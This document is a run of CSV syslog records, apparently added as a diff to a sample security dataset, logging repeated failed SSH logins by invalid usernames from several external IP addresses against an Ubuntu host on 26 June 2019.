+19245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:02,UbuntuDevEnv,2019-06-26 13:46:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:02,UbuntuDevEnv,2019-06-26 13:46:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+19247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:04,UbuntuDevEnv,2019-06-26 13:46:03,auth,UbuntuDevEnv,info,Failed password for invalid user carol from 139.199.34.112 port 39698 ssh2,129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carol,139.199.34.1,39698,,
+19248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:05,UbuntuDevEnv,2019-06-26 13:46:04,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 39698:11: Bye Bye [preauth],129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,39698,,
+19249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:05,UbuntuDevEnv,2019-06-26 13:46:04,auth,UbuntuDevEnv,info,Disconnected from invalid user carol 139.199.34.112 port 39698 [preauth],129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carol,139.199.34.1,39698,,
+19250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:10,UbuntuDevEnv,2019-06-26 13:46:10,auth,UbuntuDevEnv,info,Invalid user admin from 157.230.115.27 port 41032,129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,41032,,
+19251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:10,UbuntuDevEnv,2019-06-26 13:46:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:10,UbuntuDevEnv,2019-06-26 13:46:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:11,UbuntuDevEnv,2019-06-26 13:46:11,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 157.230.115.27 port 41032 ssh2,129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,41032,,
+19254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:11,UbuntuDevEnv,2019-06-26 13:46:11,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 157.230.115.27 port 41032 [preauth],129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,41032,,
+19255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:11,UbuntuDevEnv,2019-06-26 13:46:11,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 41032:11: Bye Bye [preauth],129698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,41032,,
+19256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:18,UbuntuDevEnv,2019-06-26 13:58:18,auth,UbuntuDevEnv,info,Invalid user ftpuser from 157.230.115.27 port 49638,1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,157.230.115.2,49638,,
+19257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:18,UbuntuDevEnv,2019-06-26 13:58:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:18,UbuntuDevEnv,2019-06-26 13:58:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:21,UbuntuDevEnv,2019-06-26 13:58:20,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 157.230.115.27 port 49638 ssh2,1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,157.230.115.2,49638,,
+19260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:21,UbuntuDevEnv,2019-06-26 13:58:20,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 49638:11: Bye Bye [preauth],1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,49638,,
+19261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:21,UbuntuDevEnv,2019-06-26 13:58:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 157.230.115.27 port 49638 [preauth],1754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,157.230.115.2,49638,,
+19262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:28,UbuntuDevEnv,2019-06-26 13:58:28,auth,UbuntuDevEnv,info,Invalid user pentakill from 180.76.96.9 port 57394,1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,180.76.96.9,57394,,
+19263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:28,UbuntuDevEnv,2019-06-26 13:58:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:28,UbuntuDevEnv,2019-06-26 13:58:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:30,UbuntuDevEnv,2019-06-26 13:58:30,auth,UbuntuDevEnv,info,Failed password for invalid user pentakill from 180.76.96.9 port 57394 ssh2,1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,180.76.96.9,57394,,
+19266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:31,UbuntuDevEnv,2019-06-26 13:58:31,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 57394:11: Bye Bye [preauth],1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,57394,,
+19267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:31,UbuntuDevEnv,2019-06-26 13:58:31,auth,UbuntuDevEnv,info,Disconnected from invalid user pentakill 180.76.96.9 port 57394 [preauth],1788,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,180.76.96.9,57394,,
+19268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:52,UbuntuDevEnv,2019-06-26 13:58:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:52,UbuntuDevEnv,2019-06-26 13:58:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:52,UbuntuDevEnv,2019-06-26 13:58:51,auth,UbuntuDevEnv,info,Invalid user pi from 196.46.36.144 port 57328,1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,196.46.36.1,57328,,
+19271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:53,UbuntuDevEnv,2019-06-26 13:58:53,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 196.46.36.144 port 57328 ssh2,1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,196.46.36.1,57328,,
+19272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:53,UbuntuDevEnv,2019-06-26 13:58:53,auth,UbuntuDevEnv,info,Disconnected from invalid user pi 196.46.36.144 port 57328 [preauth],1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,196.46.36.1,57328,,
+19273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:58:53,UbuntuDevEnv,2019-06-26 13:58:53,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 57328:11: Bye Bye [preauth],1863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,57328,,
+19274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:13,UbuntuDevEnv,2019-06-26 13:59:12,auth,UbuntuDevEnv,info,Invalid user run from 68.183.50.149 port 33590,1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,run,68.183.50.1,33590,,
+19275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:13,UbuntuDevEnv,2019-06-26 13:59:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:13,UbuntuDevEnv,2019-06-26 13:59:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:15,UbuntuDevEnv,2019-06-26 13:59:14,auth,UbuntuDevEnv,info,Failed password for invalid user run from 68.183.50.149 port 33590 ssh2,1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,run,68.183.50.1,33590,,
+19278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:15,UbuntuDevEnv,2019-06-26 13:59:14,auth,UbuntuDevEnv,info,Disconnected from invalid user run 68.183.50.149 port 33590 [preauth],1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,run,68.183.50.1,33590,,
+19279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:59:15,UbuntuDevEnv,2019-06-26 13:59:14,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33590:11: Bye Bye [preauth],1955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33590,,
+19280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:53,UbuntuDevEnv,2019-06-26 14:01:52,auth,UbuntuDevEnv,info,Invalid user jira from 157.230.115.27 port 56126,2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,157.230.115.2,56126,,
+19281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:53,UbuntuDevEnv,2019-06-26 14:01:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:53,UbuntuDevEnv,2019-06-26 14:01:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:54,UbuntuDevEnv,2019-06-26 14:01:54,auth,UbuntuDevEnv,info,Failed password for invalid user jira from 157.230.115.27 port 56126 ssh2,2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,157.230.115.2,56126,,
+19284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:54,UbuntuDevEnv,2019-06-26 14:01:54,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 56126:11: Bye Bye [preauth],2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,56126,,
+19285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:54,UbuntuDevEnv,2019-06-26 14:01:54,auth,UbuntuDevEnv,info,Disconnected from invalid user jira 157.230.115.27 port 56126 [preauth],2605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,157.230.115.2,56126,,
+19286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:13,UbuntuDevEnv,2019-06-26 14:02:13,auth,UbuntuDevEnv,info,Invalid user admin from 68.183.50.149 port 39298,2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,39298,,
+19287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:13,UbuntuDevEnv,2019-06-26 14:02:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:13,UbuntuDevEnv,2019-06-26 14:02:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:16,UbuntuDevEnv,2019-06-26 14:02:15,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 68.183.50.149 port 39298 ssh2,2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,39298,,
+19290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:16,UbuntuDevEnv,2019-06-26 14:02:15,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 68.183.50.149 port 39298 [preauth],2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,39298,,
+19291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:02:16,UbuntuDevEnv,2019-06-26 14:02:15,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39298:11: Bye Bye [preauth],2684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39298,,
+19292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:43,UbuntuDevEnv,2019-06-26 14:03:42,auth,UbuntuDevEnv,info,Invalid user fo from 68.183.50.149 port 56246,3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fo,68.183.50.1,56246,,
+19293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:43,UbuntuDevEnv,2019-06-26 14:03:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:43,UbuntuDevEnv,2019-06-26 14:03:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:44,UbuntuDevEnv,2019-06-26 14:03:44,auth,UbuntuDevEnv,info,Failed password for invalid user fo from 68.183.50.149 port 56246 ssh2,3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fo,68.183.50.1,56246,,
+19296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:44,UbuntuDevEnv,2019-06-26 14:03:44,auth,UbuntuDevEnv,info,Disconnected from invalid user fo 68.183.50.149 port 56246 [preauth],3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fo,68.183.50.1,56246,,
+19297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:03:44,UbuntuDevEnv,2019-06-26 14:03:44,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56246:11: Bye Bye [preauth],3002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56246,,
+19298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:09,UbuntuDevEnv,2019-06-26 14:04:08,auth,UbuntuDevEnv,info,Invalid user zhengye from 196.46.36.144 port 45429,3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhengye,196.46.36.1,45429,,
+19299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:09,UbuntuDevEnv,2019-06-26 14:04:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:09,UbuntuDevEnv,2019-06-26 14:04:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:11,UbuntuDevEnv,2019-06-26 14:04:10,auth,UbuntuDevEnv,info,Failed password for invalid user zhengye from 196.46.36.144 port 45429 ssh2,3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhengye,196.46.36.1,45429,,
+19302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:11,UbuntuDevEnv,2019-06-26 14:04:11,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 45429:11: Bye Bye [preauth],3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,45429,,
+19303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:04:11,UbuntuDevEnv,2019-06-26 14:04:11,auth,UbuntuDevEnv,info,Disconnected from invalid user zhengye 196.46.36.144 port 45429 [preauth],3090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhengye,196.46.36.1,45429,,
+19304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:11,UbuntuDevEnv,2019-06-26 14:05:11,auth,UbuntuDevEnv,info,Invalid user solr from 68.183.50.149 port 44962,3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,solr,68.183.50.1,44962,,
